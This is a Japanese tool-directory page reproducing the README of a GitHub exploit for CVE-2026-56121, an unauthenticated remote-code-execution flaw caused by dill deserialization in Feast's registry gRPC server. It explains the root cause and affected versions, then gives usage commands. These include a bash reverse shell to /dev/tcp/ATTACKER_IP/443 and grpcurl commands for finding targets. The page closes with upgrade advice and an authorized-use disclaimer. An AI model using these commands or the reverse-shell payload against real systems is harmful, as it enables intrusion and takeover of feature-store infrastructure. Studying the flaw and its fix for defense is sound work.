Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-56121_exploit — FeastレジストリgRPCサーバー向けの認証不要のRCEエクスプロイト(CVE-2026-56121)。dillによるデシリアライゼーションを利用。ペイロード生成、リバースシェル対応、gRPCリフレクションによるターゲット識別を含む。 | Kitploit
ツール/GitHubGitHub/0xdak/cve-2026-56121_exploit
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHub0xdak/cve-2026-56121_exploit

CVE-2026-56121_exploit

FeastレジストリgRPCサーバー向けの認証不要のRCEエクスプロイト(CVE-2026-56121)。dillによるデシリアライゼーションを利用。ペイロード生成、リバースシェル対応、gRPCリフレクションによるターゲット識別を含む。

リポジトリを見る
128日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-56121 — Feast Registry 認証なしRCE (dill.loads)

Feast フィーチャーストアの レジストリ gRPC サーバー における認証なしリモートコード実行。

ApplyFeatureView RPC は、リクエストプロトから OnDemandFeatureView を再構築します。その際、spec.user_defined_function.body を base64 デコードし、認証チェックより前に dill.loads() に渡します。dill は pickle のスーパーセットであるため、__reduce__ が (os.system, (cmd,)) を返すオブジェクトは、サーバーが逆シリアル化した瞬間に任意のコマンドを実行します。デフォルトのデプロイでは auth: no_auth が指定されているため、レジストリポートへの単一の認証なし gRPC リクエストで十分です。

  • 影響を受けるバージョン: Feast < 0.63.0
  • 修正バージョン: Feast 0.63.0
  • デフォルトポート: 6570 (レジストリ gRPC)
  • CWE: 502 (信頼できないデータのデシリアライゼーション)
  • 影響: レジストリサービスユーザーとしてのRCE (多くの場合、フィーチャーストア全体のコントロールプレーン)

必要条件

エクスプロイトは Feast 自身が生成した gRPC protos を再利用するため、攻撃者側に脆弱な Feast をインストールします:

root@kitploit:~
python3 -m venv venv && . venv/bin/activate
pip install "feast==0.62.0" grpcio

使用方法

root@kitploit:~
# quick check (output appears on the SERVER, not locally)
python3 exploit.py 10.10.10.10:6570 -c "id"

# reverse shell (bash -c wrapper: os.system uses /bin/sh, which lacks /dev/tcp)
python3 exploit.py 10.10.10.10:6570 -c 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1"'

-p/--project はプロジェクト名を設定します (デフォルトは feature_repo)。コマンド出力はレジストリホストの stdout/journal に出力されるため、結果を確認するにはリバースシェルを使用するか、読み取り可能なパスに書き込んでください。

ターゲットの特定

レジストリは gRPC リフレクションが有効です:

root@kitploit:~
grpcurl -plaintext 10.10.10.10:6570 list
# feast.registry.RegistryServer
# grpc.health.v1.Health
# grpc.reflection.v1alpha.ServerReflection

対策

Feast 0.63.0 以降 にアップグレードし、認証バックエンドを有効にし、レジストリ gRPC ポートを信頼できないネットワークに公開しないでください。

免責事項

許可されたセキュリティテストおよび教育目的のみに使用してください。自分が所有するシステム、またはテストする明示的な許可があるシステムに対してのみ使用してください。

ツールをダウンロード